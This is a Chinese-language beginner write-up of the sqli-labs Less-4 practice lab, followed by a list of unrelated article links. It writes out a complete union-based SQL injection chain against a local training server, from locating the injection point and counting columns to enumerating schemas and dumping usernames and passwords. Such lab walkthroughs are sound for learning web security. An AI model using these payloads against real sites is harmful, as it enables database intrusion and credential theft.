sqli-labs-less-4圖文詳解，適合小白

Hello World --發表於2020-10-23

Less-4

less1-3以釋出，1-4題相關知識點在https://blog.csdn.net/qq_46432288/article/details/109226871中，點選檢視吧！！！
less-4與1-3方法基本一致，只是最開始的判斷注入點有一點差別。

判斷注入：

http://127.0.0.1/sqli-labs-master/Less-4/?id=1 顯示正常
在這裡插入圖片描述

http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 顯示正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1’’ 顯示正常（兩個單引號）
http://127.0.0.1/sqli-labs-master/Less-4/?id=2" 顯示錯誤（一個雙引號），錯誤：’“2"”) LIMIT 0,1’，出現一個）
在這裡插入圖片描述

http://127.0.0.1/sqli-labs-master/Less-4/?id=2")–+ 顯示正常，判斷原資料輸入後應該為(“id”)
在這裡插入圖片描述

判斷欄位列數：

http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 10 --+
在這裡插入圖片描述
顯示Unknown column ‘10’ in ‘order clause’，說明欄位列數少於10，繼續縮小數值進行測試。
http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 3 --+ 正常顯示，表明欄位列數為3

判斷可回顯位：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,3 --+
在這裡插入圖片描述

判斷當前資料庫：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,database() --+
在這裡插入圖片描述

判斷當前使用者：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,user() --+

檢視所有資料庫：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(schema_name) from information_schema.schemata --+
在這裡插入圖片描述

檢視當前資料庫中的所有表：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+
在這裡插入圖片描述

檢視users表中的欄位：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
在這裡插入圖片描述

輸出username：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(username) from security.users --+
在這裡插入圖片描述

輸出password:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(password) from security.users --+
在這裡插入圖片描述

將username和password連線並聯合輸出：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(concat_ws(’~’,username,password)) from security.users --+
在這裡插入圖片描述

Less-4結束

。。。未完待續

相關文章

python適合小白學嗎？
2021-09-11
Python
PyCharm的使用教程【圖文結合-詳細】
2021-12-02
PyCharm
Java泛型詳解，史上最全圖文詳解！
2022-02-14
Java泛型
PopClip使用教程圖文詳解
2022-12-12
Git使用教程圖文詳解
2016-03-01
Git
Typora+圖床詳解（小白都能學得會）
2020-12-15
圖床
分頁機制圖文詳解
2018-03-11
DEVONthink詳解|哪些檔案最適合放進 DEVONthink？
2020-12-21
dev
520 頁機器學習筆記！圖文並茂可能更適合你
2019-10-25
機器學習筆記
圖文詳解23種設計模式
2021-12-29
設計模式
圖文並茂詳解 NAT 協議！
2022-02-23
協議
微信公共號申請圖文詳解
2017-02-21
Android圖文詳解屬性動畫
2015-12-16
Android動畫
[適合小白的Linu基礎入門教程一
2021-01-04
EventBus 3.0+ 原始碼詳解（史上最詳細圖文講解）
2018-07-30
原始碼
事務隔離級別(圖文詳解)
2019-04-10
LL圖文詳解mysql中with...as用法hux
2022-03-01
MySqlUX
微服務最全詳解(圖文全面總結)
2024-02-07
微服務
cookie與session的區別（圖文詳解）
2020-12-23
CookieSession
Android圖文混排實現方式詳解
2017-08-31
Android
Android RxJava ：圖文詳解背壓策略
2018-01-02
AndroidRxJava
圖文詳解C#單元測試
2012-10-30
C#
JasperReport初級教程(2.0.3)圖文詳解
2009-11-17
Jenkins安裝部署使用圖文詳解（非常詳細）
2021-12-23
Jenkins
【分享】5個非常適合Python小白的開發工具!
2022-05-17
Python
適合新手小白的UI學習路線完整版
2018-10-16
UI
非常適合小白入門的Python學習路線
2020-09-18
Python
socket基礎詳解小白白
2020-10-30
Java單連結串列反轉圖文詳解
2021-04-02
Java
圖文詳解Java物件記憶體佈局
2021-04-03
Java物件記憶體
負載均衡最全詳解(圖文全面總結)
2024-02-08
負載
EF三種程式設計方式圖文詳解
2017-06-22
程式設計
mysql資料庫的安裝（圖文詳解）
2024-03-17
MySql資料庫
非常適合小白入門的Go語言學習路線
2020-09-18
Go
Python適合初學者或者0基礎小白學習嗎?
2021-11-25
Python
小白轉行，python、Java、c++選擇哪個合適？
2022-03-31
PythonJavaC++
Android 中 Canvas 繪圖之 Shader 使用圖文詳解
2016-07-22
AndroidCanvas繪圖
Android中Canvas繪圖之Shader使用圖文詳解
2016-01-15
AndroidCanvas繪圖